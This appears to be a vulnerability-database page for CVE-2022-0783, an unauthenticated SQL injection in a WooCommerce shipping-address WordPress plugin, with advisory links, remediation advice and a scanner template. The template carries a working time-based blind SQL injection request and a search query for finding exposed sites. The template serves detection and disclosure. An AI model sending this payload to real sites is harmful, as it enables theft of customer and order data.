| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2022-0783 | 2 May 202216:15 | – | attackerkb | |
| CVE-2022-0783 | 2 May 202220:27 | – | circl | |
| WordPress plugin Multiple Shipping Address Woocommerce SQL注入漏洞 | 2 May 202200:00 | – | cnnvd | |
| WordPress Multiple Shipping Address Woocommerce plugin SQL注入漏洞 | 7 May 202200:00 | – | cnvd | |
| CVE-2022-0783 | 2 May 202216:05 | – | cve | |
| CVE-2022-0783 Multiple Shipping Address Woocommerce < 2.0 - Unauthenticated SQLi | 2 May 202216:05 | – | cvelist | |
| CVE-2022-0783 | 2 May 202216:15 | – | nvd | |
| CVE-2022-0783 | 2 May 202216:15 | – | osv | |
| WordPress Multiple Shipping Address WooCommerce plugin <= 1.0 - Unauthenticated SQL Injection (SQLi) vulnerability | 11 Apr 202200:00 | – | patchstack | |
| Sql injection | 2 May 202216:15 | – | prion |
id: CVE-2022-0783
info:
name: Multiple Shipping Address Woocommerce < 2.0 - SQL Injection
author: ritikchaddha
severity: high
description: |
The Multiple Shipping Address Woocommerce plugin before 2.0 does not properly sanitize and escape numerous parameters before using them in SQL statements via some AJAX actions available to unauthenticated users, leading to unauthenticated SQL injections.
impact: |
Unauthenticated attackers can execute time-based blind SQL injection to extract database contents, potentially exposing sensitive WooCommerce customer and order data.
remediation: |
Update the Multiple Shipping Address Woocommerce plugin to version 2.0 or later.
reference:
- https://wpscan.com/vulnerability/4d594424-8048-482d-b61c-45be1e97a8ba/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0783
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.6
cve-id: CVE-2022-0783
cwe-id: CWE-89
epss-score: 0.07866
epss-percentile: 0.93989
cpe: cpe:2.3:a:themehigh:multiple_shipping_addresses_for_woocommerce:*:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: themehigh
product: multiple_shipping_addresses_for_woocommerce
fofa-query: body="wp-content/plugins/multiple-shipping-address-woocommerce"
tags: cve,cve2022,wordpress,wp,wp-plugin,multiple-shipping-address-woocommerce,sqli,vuln
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=ocwma_choice_address&sid=3+AND+(SELECT+1946+FROM+(SELECT(SLEEP(7)))zsme)
matchers:
- type: dsl
dsl:
- "duration>=7"
- "len(body) == 5"
- "status_code==200"
- "regex('false$', body)"
condition: and
# digest: 490a0046304402204389858c24c4586667c31d0daab1598dff7798d63cb319a4f6e9d6c69a1b03e10220059fe190008c9fcdb0da5fffb6c3705dcabeddc7fb7c7211a9a00676c53c7fea:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation